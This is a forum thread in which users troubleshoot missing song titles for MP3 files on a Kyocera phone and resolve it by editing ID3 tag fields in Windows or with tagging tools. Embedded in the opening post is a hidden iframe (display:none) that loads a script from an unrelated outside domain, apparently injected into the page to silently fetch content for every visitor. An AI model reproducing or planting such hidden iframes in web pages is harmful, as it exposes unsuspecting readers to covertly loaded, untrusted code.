+ Reply to Thread

No title for MP3 files !?!

After I install my MP3 files on my phone,(using Kyocera MP3 Desktop)
    some of the songs don't have a title. The song will play just fine, Even when I go to song info. it will only show the song's length, kbps, kHz.
    All songs have been converted to 128 kbps.
    Has anyone else run into this.?
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: No title for MP3 files !?!

Originally posted by twoendo
    After I install my MP3 files on my phone,(using Kyocera MP3 Desktop)
    some of the songs don't have a title. The song will play just fine, Even when I go to song info. it will only show the song's length, kbps, kHz.
    All songs have been converted to 128 kbps.
    Has anyone else run into this.?
    I have two songs on my 7135 that dont have titles, I dont know why this happens, I tried deleting the songs and re-installing them, but the results were the same.

Re: Re: No title for MP3 files !?!

Originally posted by imz14u2nv
    I have two songs on my 7135 that dont have titles, I dont know why this happens, I tried deleting the songs and re-installing them, but the results were the same.
    Probably goes back to the ORIGINAL mp3 file. Where did ya get it? It may not have had any 'info' in it to start.

Check the ORIGNAL mp3 file on your PC. Right click on it and then click on PROPERTIES. In XP (not sure on other OS's) this brings up the file with 4 tabs: General, security, the song title and summary.

Click on the song title tab and it will show 4 fields: Title, Artist, Album, and Comment.

THESE are the fields that the mp3 player is searching for a title in. I would assume that they are currently blank. Fill them in with the appropriate information, and get em back on your SD Card in whatever manner you normally do.

That SHOULD do the trick.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Re: Re: Re: No title for MP3 files !?!

Originally posted by djjefft
    Probably goes back to the ORIGINAL mp3 file. Where did ya get it? It may not have had any 'info' in it to start.

Check the ORIGNAL mp3 file on your PC. Right click on it and then click on PROPERTIES. In XP (not sure on other OS's) this brings up the file with 4 tabs: General, security, the song title and summary.

Click on the song title tab and it will show 4 fields: Title, Artist, Album, and Comment.

THESE are the fields that the mp3 player is searching for a title in. I would assume that they are currently blank. Fill them in with the appropriate information, and get em back on your SD Card in whatever manner you normally do.

That SHOULD do the trick.

Jeff
    This also works on Windows2000, although some MP3's cause a fatal error on my install.

If you have a bunch of these, you can use an ID3 tag program. I use freescene ID3 intellegent Tagger because it is free and can do bulk operations. See http://freescene.sourceforge.net/

Alan

Thanks for the info, I was able to correct the title info with Windows xp, I was going to check at some point, but you guys saved me tons of time.

Another utilitiy that gives you many, many options for your mp3s is MP3 Tag Studio.

http://www.magnusbrading.com/mp3ts/

Thanks for all the help.
    I do have Windows XP and added titles & artist in the properties of the songs.
    That worked out great and all of the songs are showing up on my phnoe now...thanks again.